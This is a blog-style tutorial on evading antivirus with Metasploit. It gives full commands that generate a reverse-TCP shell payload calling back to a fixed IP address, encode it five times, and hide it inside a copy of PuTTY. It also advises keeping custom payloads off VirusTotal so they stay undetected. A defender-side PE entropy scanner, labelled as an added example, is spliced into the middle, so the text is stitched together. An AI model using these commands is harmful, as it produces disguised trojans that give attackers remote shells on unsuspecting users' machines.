Antivirus Evasion With Metasploit

I’ve been working on producing a payload that can evade a specific antivirus product and figured I would share my notes in a post. Most documentation I have found has not been updated since 2010.

So the first thing we need to do is to figure out what payload we want to use. Since Metasploit is so well-known, there isn’t a huge difference in detection rates in their raw state as seen in the image below, so pick the one that works for you.

[Image: detection rates of raw Metasploit payloads across AV products. Source: fuzzexp.org]

I’ll use windows/shell/reverse_tcp for this post. Pass the needed options to msfpayload and we’re done with the first step.

msfpayload windows/shell/reverse_tcp LHOST=62.141.42.101 LPORT=4444 R

The next thing we need to do is pipe that to msfencode to encode the payload. In its current version, Metasploit comes with 27 different encoders. Shikata Ga Nai is the only “excellent” rated x86 encoder of the bunch, so we’ll use that. We also want to run the encoder 5 times, set the template to EXE, and specify the output location, so those options are thrown in there as well.

msfpayload windows/shell/reverse_tcp LHOST=62.141.42.101 LPORT=4444 R | msfencode -e x86/shikata_ga_nai -c 5 -t exe -o /root/payloads/basic.exe

The problem with this is that AV will usually pick up Metasploit’s default templates, so we need to either develop our own or provide a different one. Since making a custom EXE template is a little past my current skill level, we’ll use PuTTY as our template. Download the executable from their website, put it somewhere you’ll remember, and pass it to msfencode with the -x option.

msfpayload windows/shell/reverse_tcp LHOST=62.141.42.101 LPORT=4444 R | msfencode -e x86/shikata_ga_nai -c 5 -x /root/putty.exe -t exe -o /root/payloads/putty.exe

Now we have a quintuple-encoded reverse_tcp payload embedded in PuTTY. Sounds great, right? Not so much. This piece of malware’s signature is picked up by 30 of 40 antivirus solutions according to VirusTotal.
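From the defender’s side, it is worth seeing why a payload stamped into a host executable this way is easy to spot even without a signature. Embedding an encoded payload into an existing binary leaves structural traces in the PE section table: a section that is both writable and executable, and a block of near-random bytes (multi-pass encoder output has much higher entropy than compiled code). The script below is an added example, not code from the post or from the Metasploit project: a minimal, dependency-free PE section scanner that reports those two traits, plus a constructed toy PE to run it against. The entropy threshold of 7.0 bits per byte and the 512-byte minimum section size are assumptions chosen for the demo, not values taken from any AV product.

```python
# Added example (not from the original post): scan a PE's section table for
# writable+executable sections and for high-entropy sections.  The toy PE
# produced by build_toy_pe() is constructed here for demonstration only.
import hashlib
import math
import struct
from dataclasses import dataclass

IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000

ENTROPY_THRESHOLD = 7.0  # bits/byte; assumption chosen for this demo
MIN_SECTION_SIZE = 512   # entropy of tiny sections is not meaningful


@dataclass
class Section:
    name: str
    raw_offset: int
    raw_size: int
    characteristics: int
    entropy: float


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte: 0.0 for constant data, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def parse_sections(pe: bytes) -> list:
    """Walk the COFF section table of a PE image and return its sections."""
    if pe[:2] != b"MZ":
        raise ValueError("not a DOS/PE image")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature missing")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", pe, coff + 2)[0]
    opt_size = struct.unpack_from("<H", pe, coff + 16)[0]
    table = coff + 20 + opt_size  # section headers follow the optional header
    sections = []
    for i in range(num_sections):
        (name, _vsize, _va, raw_size, raw_off, _reloc, _lines,
         _nreloc, _nlines, chars) = struct.unpack_from("<8sIIIIIIHHI", pe, table + 40 * i)
        body = pe[raw_off:raw_off + raw_size]
        sections.append(Section(name.rstrip(b"\0").decode("ascii", "replace"),
                                raw_off, raw_size, chars, shannon_entropy(body)))
    return sections


def suspicious_reasons(sec: Section) -> list:
    """Return the heuristic findings for one section (empty list if clean)."""
    reasons = []
    if sec.characteristics & IMAGE_SCN_MEM_WRITE and sec.characteristics & IMAGE_SCN_MEM_EXECUTE:
        reasons.append("writable+executable")
    if sec.raw_size >= MIN_SECTION_SIZE and sec.entropy > ENTROPY_THRESHOLD:
        reasons.append(f"high entropy ({sec.entropy:.2f} bits/byte)")
    return reasons


def scan(pe: bytes) -> dict:
    """Map section name -> reasons, for every section that raised a finding."""
    findings = {}
    for sec in parse_sections(pe):
        reasons = suspicious_reasons(sec)
        if reasons:
            findings[sec.name] = reasons
    return findings


def pseudo_random_bytes(n: int, seed: bytes = b"constructed") -> bytes:
    """Deterministic high-entropy filler (a SHA-256 chain) standing in for encoder output."""
    out, h = bytearray(), seed
    while len(out) < n:
        h = hashlib.sha256(h).digest()
        out += h
    return bytes(out[:n])


def build_toy_pe(sections) -> bytes:
    """Build a minimal PE32 image from (name, data, characteristics) triples. Constructed, not loadable."""
    n, opt_size, file_align = len(sections), 224, 0x200
    headers_len = 0x40 + 4 + 20 + opt_size + 40 * n
    data_start = (headers_len + file_align - 1) // file_align * file_align
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", 0x40)  # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, n, 0, 0, 0, opt_size, 0x0102)
    headers, bodies, off, va = b"", b"", data_start, 0x1000
    for name, data, chars in sections:
        size = (len(data) + file_align - 1) // file_align * file_align
        headers += struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\0"),
                               len(data), va, size, off, 0, 0, 0, 0, chars)
        bodies += data.ljust(size, b"\0")
        off, va = off + size, va + 0x1000
    image = dos + b"PE\0\0" + coff + b"\0" * opt_size + headers
    return image.ljust(data_start, b"\0") + bodies


if __name__ == "__main__":
    toy = build_toy_pe([
        (".text", b"\x90" * 2048 + b"\xC3" * 2048, IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ),
        (".inject", pseudo_random_bytes(4096), IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
    ])
    for name, reasons in scan(toy).items():
        print(f"{name}: {', '.join(reasons)}")
```

Run against a real file by replacing the toy with `open(path, "rb").read()`. The constructed `.inject` section trips both heuristics, while the low-entropy, read/execute-only `.text` section is left alone. These are heuristics, so a packed or compressed legitimate binary will also score high on entropy; the cheaper and more decisive check for a trojanised copy of a known tool is to compare the file’s hash against the checksums the vendor publishes, which the host-executable trick cannot survive.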

A quick note on VirusTotal: DON’T SUBMIT YOUR CUSTOM STUFF TO VIRUSTOTAL! The signature will be known and will begin to be detected. Your best bet for testing is to have a box set up with the AV you’re trying to evade, update the signature database, and then disconnect it from the network.

Obviously, there are more advanced techniques and different ways than I’ve provided here, but this should provide a foundation to build off of. I will make a new post on writing custom executable templates once I get a better understanding of that process.

Until next time.

More information and advanced tactics can be found here:

http://fuzzexp.org/anti-virus-evasion-for-metasploit.html

http://www.rapid7.com/resources/videos/evading-anti-virus-detection-with-metasploit.jsp